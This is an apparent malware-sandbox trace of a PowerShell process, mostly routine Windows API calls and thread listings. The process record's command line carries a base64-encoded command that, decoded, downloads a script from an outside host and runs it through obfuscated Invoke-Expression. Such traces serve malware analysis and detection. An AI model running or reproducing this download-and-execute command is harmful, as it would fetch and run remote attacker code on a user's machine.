	[0943.453] lstrcpyW (in: lpString1=0x2d1000, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0943.453] CoTaskMemFree (pv=0x2d1000) 
	[0943.453] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x0, puLen=0xedc70) returned 0
	[0943.453] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x0, puLen=0xedc70) returned 0
	[0943.453] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedc78, puLen=0xedc70 | out: lplpBuffer=0xedc78*=0x0, puLen=0xedc70) returned 0
	[0943.453] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2e92b04, puLen=0xedc40) returned 1
	[0943.453] CoTaskMemAlloc (cb=0x204) returned 0x311dc0
	[0943.453] VerLanguageNameW (in: wLang=0x0, szLang=0x311dc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0943.454] CoTaskMemFree (pv=0x311dc0) 
	[0943.454] VerQueryValueW (in: pBlock=0x2e92a68, lpSubBlock="\\", lplpBuffer=0xedc98, puLen=0xedc90 | out: lplpBuffer=0xedc98*=0x2e92a90, puLen=0xedc90) returned 1
	[0943.455] CoTaskMemAlloc (cb=0x104) returned 0x366e70
	[0943.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x366e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.455] CoTaskMemFree (pv=0x366e70) 
	[0943.457] CoTaskMemAlloc (cb=0x104) returned 0x366e70
	[0943.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x366e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.457] CoTaskMemFree (pv=0x366e70) 
	[0943.463] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xedb68 | out: phkResult=0xedb68*=0x2e8) returned 0x0
	[0943.464] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xedb58 | out: phkResult=0xedb58*=0x2ec) returned 0x0
	[0943.464] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xedbe8 | out: phkResult=0xedbe8*=0x2f0) returned 0x0
	[0943.466] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xedb2c, lpData=0x0, lpcbData=0xedb28*=0x0 | out: lpType=0xedb2c*=0x1, lpData=0x0, lpcbData=0xedb28*=0x56) returned 0x0
	[0943.467] CoTaskMemAlloc (cb=0x5a) returned 0x2d11c0
	[0943.467] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xedafc, lpData=0x2d11c0, lpcbData=0xedaf8*=0x56 | out: lpType=0xedafc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xedaf8*=0x56) returned 0x0
	[0943.467] CoTaskMemFree (pv=0x2d11c0) 
	[0943.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0943.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0943.999] CoTaskMemAlloc (cb=0x104) returned 0x367e70
	[0943.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x367e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.999] CoTaskMemFree (pv=0x367e70) 
	[0945.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0945.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0946.203] CoTaskMemAlloc (cb=0x104) returned 0x2f9900
	[0946.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.204] CoTaskMemFree (pv=0x2f9900) 
	[0946.205] CoTaskMemAlloc (cb=0x104) returned 0x3702a0
	[0946.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.206] CoTaskMemFree (pv=0x3702a0) 
	[0946.883] CoTaskMemAlloc (cb=0x104) returned 0x3702a0
	[0946.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.883] CoTaskMemFree (pv=0x3702a0) 
	[0946.883] CoTaskMemAlloc (cb=0x104) returned 0x3702a0
	[0946.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.883] CoTaskMemFree (pv=0x3702a0) 
	[0946.883] CoTaskMemAlloc (cb=0x104) returned 0x3702a0
	[0946.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.884] CoTaskMemFree (pv=0x3702a0) 
	[0947.526] CoTaskMemAlloc (cb=0x104) returned 0x3702a0
	[0947.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.526] CoTaskMemFree (pv=0x3702a0) 
	[0947.529] CoTaskMemAlloc (cb=0x104) returned 0x3702a0
	[0947.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.529] CoTaskMemFree (pv=0x3702a0) 
	[0956.217] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0956.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.217] CoTaskMemFree (pv=0x3704c0) 
	[0956.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xed840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0956.232] SetErrorMode (uMode=0x1) returned 0x1
	[0956.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xedac0 | out: lpFileInformation=0xedac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0956.232] SetErrorMode (uMode=0x1) returned 0x1
	[0974.718] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0974.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.718] CoTaskMemFree (pv=0x3704c0) 
	[0974.719] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0974.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.719] CoTaskMemFree (pv=0x3704c0) 
	[0974.719] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0974.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.719] CoTaskMemFree (pv=0x3704c0) 
	[0974.721] CoCreateGuid (in: pguid=0xede88 | out: pguid=0xede88*(Data1=0x89cf0e00, Data2=0xf708, Data3=0x4a0d, Data4=([0]=0xab, [1]=0x77, [2]=0xe5, [3]=0x66, [4]=0x83, [5]=0x23, [6]=0xd9, [7]=0x44))) returned 0x0
	[0974.724] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0974.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.725] CoTaskMemFree (pv=0x3704c0) 
	[0974.727] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0974.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.727] CoTaskMemFree (pv=0x3704c0) 
	[0974.730] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0974.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.730] CoTaskMemFree (pv=0x3704c0) 
	[0974.749] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0974.851] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xedb30 | out: lpConsoleScreenBufferInfo=0xedb30) returned 1
	[0974.869] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0974.870] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xedb30 | out: lpConsoleScreenBufferInfo=0xedb30) returned 1
	[0974.873] GetVersionExW (in: lpVersionInformation=0xedac0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedac0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0974.876] GetCurrentProcess () returned 0xffffffffffffffff
	[0974.877] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xedb58 | out: TokenHandle=0xedb58*=0x304) returned 1
	[0974.881] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xeda78 | out: TokenInformation=0x0, ReturnLength=0xeda78) returned 0
	[0974.882] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3111e0
	[0974.882] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x3111e0, TokenInformationLength=0x4, ReturnLength=0xeda78 | out: TokenInformation=0x3111e0, ReturnLength=0xeda78) returned 1
	[0974.884] DuplicateTokenEx (in: hExistingToken=0x304, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xedbd8 | out: phNewToken=0xedbd8*=0x300) returned 1
	[0974.884] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xeda78 | out: TokenInformation=0x0, ReturnLength=0xeda78) returned 0
	[0974.884] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x311210
	[0974.884] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x311210, TokenInformationLength=0x4, ReturnLength=0xeda78 | out: TokenInformation=0x311210, ReturnLength=0xeda78) returned 1
	[0974.885] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2f6d810*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xedbe8 | out: IsMember=0xedbe8) returned 1
	[0974.885] CloseHandle (hObject=0x300) returned 1
	[0974.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.992] CoTaskMemAlloc (cb=0x804) returned 0x1b7aa080
	[0974.992] GetConsoleTitleW (in: lpConsoleTitle=0x1b7aa080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0974.994] CoTaskMemFree (pv=0x1b7aa080) 
	[0975.006] CoTaskMemAlloc (cb=0x804) returned 0x1b7ab930
	[0975.006] GetConsoleTitleW (in: lpConsoleTitle=0x1b7ab930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0975.007] CoTaskMemFree (pv=0x1b7ab930) 
	[0975.008] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0975.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.209] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0975.210] CoCreateGuid (in: pguid=0xedcd0 | out: pguid=0xedcd0*(Data1=0xff1b49d, Data2=0x2698, Data3=0x4b77, Data4=([0]=0xb2, [1]=0xaa, [2]=0xfb, [3]=0x54, [4]=0x1b, [5]=0xc3, [6]=0x6f, [7]=0x54))) returned 0x0
	[0975.211] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.211] CoTaskMemFree (pv=0x3704c0) 
	[0975.215] WinSqmIsOptedIn () returned 0x0
	[0975.215] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.215] CoTaskMemFree (pv=0x3704c0) 
	[0975.216] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.216] CoTaskMemFree (pv=0x3704c0) 
	[0975.217] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.217] CoTaskMemFree (pv=0x3704c0) 
	[0975.217] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.218] CoTaskMemFree (pv=0x3704c0) 
	[0975.218] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.218] CoTaskMemFree (pv=0x3704c0) 
	[0975.219] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.219] CoTaskMemFree (pv=0x3704c0) 
	[0975.220] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.220] CoTaskMemFree (pv=0x3704c0) 
	[0975.221] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.221] CoTaskMemFree (pv=0x3704c0) 
	[0975.222] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.223] CoTaskMemFree (pv=0x3704c0) 
	[0975.226] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.227] CoTaskMemFree (pv=0x3704c0) 
	[0975.227] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.227] CoTaskMemFree (pv=0x3704c0) 
	[0975.227] CoTaskMemAlloc (cb=0x104) returned 0x3704c0
	[0975.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3704c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.227] CoTaskMemFree (pv=0x3704c0) 

Thread:
	id = 974
	os_tid = 0x1a04


Thread:
	id = 998
	os_tid = 0x1a8c


Thread:
	id = 1401
	os_tid = 0x1fcc


Thread:
	id = 1408
	os_tid = 0x1ff0


Thread:
	id = 1485
	os_tid = 0x1c78


Thread:
	id = 1567
	os_tid = 0x20d8


Thread:
	id = 1635
	os_tid = 0x2244


Thread:
	id = 1636
	os_tid = 0x2248

	[0829.939] CoGetContextToken (in: pToken=0x2aef570 | out: pToken=0x2aef570) returned 0x0
	[0829.939] CObjectContext::QueryInterface () returned 0x0
	[0829.940] CObjectContext::GetCurrentThreadType () returned 0x0
	[0829.940] Release () returned 0x0
	[0829.940] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 2152
	os_tid = 0x24f4


Process:
	id = "166"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3fbc2000"
	os_pid = "0x1804"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 902
	os_tid = 0x1808

	[0517.000] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 972
	os_tid = 0x19fc


Thread:
	id = 997
	os_tid = 0x1a88


Thread:
	id = 1881
	os_tid = 0x250c


Thread:
	id = 1882
	os_tid = 0x2510


Thread:
	id = 1888
	os_tid = 0x253c


Thread:
	id = 2044
	os_tid = 0x27e0


Process:
